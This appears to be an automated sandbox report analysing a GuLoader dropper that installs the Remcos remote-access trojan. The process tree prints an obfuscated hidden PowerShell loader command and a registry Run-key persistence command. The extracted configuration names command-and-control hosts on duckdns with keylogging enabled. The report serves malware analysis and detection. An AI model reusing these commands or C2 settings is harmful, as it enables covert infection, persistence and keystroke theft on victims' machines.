Windows
Analysis Report
zR4aIjCuRs.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64native
- zR4aIjCuRs.exe (PID: 7948 cmdline:
"C:\Users\ user\Deskt op\zR4aIjC uRs.exe" MD5: 02F086FB54D58BF17B51564B34166F5E) - powershell.exe (PID: 7872 cmdline:
"powershel l.exe" -wi ndowstyle hidden "$S udadero=Ge t-Content -Raw 'C:\U sers\user\ AppData\Ro aming\dete rminatione ns\Wanderl ustful\sva geliges\Fa lkespors.V ar';$Maalk astets=$Su dadero.Sub String(542 66,3);.$Ma alkastets( $Sudadero) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 1320 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - msiexec.exe (PID: 8020 cmdline:
"C:\Window s\syswow64 \msiexec.e xe" MD5: 9D09DC1EDA745A5F87553048E57620CF) - msiexec.exe (PID: 6448 cmdline:
"C:\Window s\syswow64 \msiexec.e xe" MD5: 9D09DC1EDA745A5F87553048E57620CF) - msiexec.exe (PID: 1264 cmdline:
"C:\Window s\syswow64 \msiexec.e xe" MD5: 9D09DC1EDA745A5F87553048E57620CF) - cmd.exe (PID: 7368 cmdline:
"C:\Window s\System32 \cmd.exe" /c REG ADD HKCU\Soft ware\Micro soft\Windo ws\Current Version\Ru n /f /v "T ragacanth" /t REG_EX PAND_SZ /d "%forenam ed% -windo wstyle 1 $ Rico36=(gp -Path 'HK CU:\Softwa re\Bistrat ose\').Fun klet114;%f orenamed% ($Rico36)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6968 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - reg.exe (PID: 6020 cmdline:
REG ADD HK CU\Softwar e\Microsof t\Windows\ CurrentVer sion\Run / f /v "Trag acanth" /t REG_EXPAN D_SZ /d "% forenamed% -windowst yle 1 $Ric o36=(gp -P ath 'HKCU: \Software\ Bistratose \').Funkle t114;%fore named% ($R ico36)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - WerFault.exe (PID: 4512 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 1 264 -s 232 4 MD5: 40A149513D721F096DDF50C04DA2F01F) - WerFault.exe (PID: 2516 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 1 264 -s 106 8 MD5: 40A149513D721F096DDF50C04DA2F01F)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
{"Host:Port:Password": "q92harbu03.duckdns.org:3980:0janbours92harbu04.duckdns.org:3981:1janbours92harbu007.duckdns.org:3981:1", "Assigned name": "MANIFESTWEALTHS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "Rmc-MK0QHY", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
Click to see the 1 entries |
System Summary |
---|
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: |
Source: | Author: frack113: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Stealing of Sensitive Information |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-06T11:47:10.534594+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49769 | 192.169.69.26 | 3980 | TCP |
2024-10-06T11:47:33.265040+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49773 | 192.169.69.26 | 3980 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-06T11:47:04.196262+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49768 | 85.120.16.93 | 443 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_004065FD | |
Source: | Code function: | 0_2_00402868 | |
Source: | Code function: | 0_2_004059CC |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: |
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | Windows user hook set: | Jump to behavior |
Source: | Code function: | 0_2_00405461 |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
System Summary |
---|
Source: | File created: | Jump to dropped file |
Source: | Code function: | 0_2_0040338F |
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_00406B15 | |
Source: | Code function: | 0_2_004072EC | |
Source: | Code function: | 0_2_00404C9E | |
Source: | Code function: | 2_2_0305EAF0 | |
Source: | Code function: | 2_2_0305EAE0 | |
Source: | Code function: | 2_2_030599A8 |
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Process created: |
Source: | Classification label: |
Source: | Code function: | 0_2_0040338F |
Source: | Code function: | 0_2_00404722 |
Source: | Code function: | 0_2_00402104 |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: | ||
Source: | Virustotal: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | File source: |
Source: | Anti Malware Scan Interface: | ||
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 2_2_030585CC | |
Source: | Code function: | 2_2_03051E4A | |
Source: | Code function: | 2_2_03051D9A | |
Source: | Code function: | 2_2_08FC454E |
Source: | File created: | Jump to dropped file |
Source: | Registry value created or modified: | Jump to behavior | ||
Source: | Registry value created or modified: | Jump to behavior |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread sleep count: | Jump to behavior |
Source: | File Volume queried: | Jump to behavior | ||
Source: | File Volume queried: | Jump to behavior |
Source: | Code function: | 0_2_004065FD | |
Source: | Code function: | 0_2_00402868 | |
Source: | Code function: | 0_2_004059CC |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-3500 | ||
Source: | API call chain: | graph_0-3504 |
Source: | System information queried: | Jump to behavior |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_03057711 |
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_0040338F |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | Mutex created: | Jump to behavior |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Obfuscated Files or Information | 11 Input Capture | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 2 PowerShell | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Software Packing | LSASS Memory | 16 System Information Discovery | Remote Desktop Protocol | 11 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 112 Process Injection | 1 DLL Side-Loading | Security Account Manager | 311 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 11 Masquerading | NTDS | 13 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Modify Registry | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 13 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | 213 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
